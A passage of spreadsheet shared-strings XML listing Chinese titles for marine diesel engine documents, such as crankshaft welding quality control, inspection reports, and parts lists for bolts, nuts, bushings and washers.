    <r>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>级运输方案</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用船规质量控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞裙质量无损检验</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造质量数字代码</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸铁微观结构检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单独的铸件拉力试验</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头超负荷质量试验</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套质量控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接曲轴曲柄质量控制</t>
    </r>
  </si>
  <si>
    <r>
      <t>L55</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴焊接检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锻造十字头质量控制</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆火焰硬化生产建议</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆火焰硬化</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>MC.S34MNV</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接曲轴生产规</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>MC.S20MO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接曲轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>L55.S36S</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊接曲轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴焊接维修</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属弧焊</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴焊接维修</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>埋弧焊</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄磁粉检查报告</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄焊接车间认证要求</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绘图说明</t>
    </r>
  </si>
  <si>
    <r>
      <t>4L35MC-S</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基础图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发电机设计</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备用辅助设备</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器对中</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气分配器清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粉末灭火系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>球阀清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管道布置详细资料</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴，轴向振动测量仪</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>槽形销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开口销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀件清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>爪盘接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摩擦联轴节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套筒联轴节</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>结合件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铰链接合</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单臂钳</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双臂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺丝杆，销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄球</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链节</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>心形套管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>矩形压缩弹簧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配六角螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角法兰螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管接头螺母和插销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带槽螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角自攻螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角或内方孔螺钉</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>翼形螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尖角螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧配螺柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>渐缩柱头螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不等螺距柱头螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三螺纹柱头螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>长</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短螺纹柱头螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单头螺纹柱头螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>全螺纹柱头螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>有涨圈槽柱头螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊柱头螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>六角管接头螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带垫圈的圆形螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带锁紧环圆形螺母</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆形帽螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管状螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方形螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外表面锥形衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>光滑的筒形衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自润滑衬套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带限位圈自润滑衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>斜切式圆盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">5 </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>X</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>状网格的有耳垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆形锁板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锯齿锁紧垫圈</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊锁紧装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>张力夹板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>木块加工圆盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
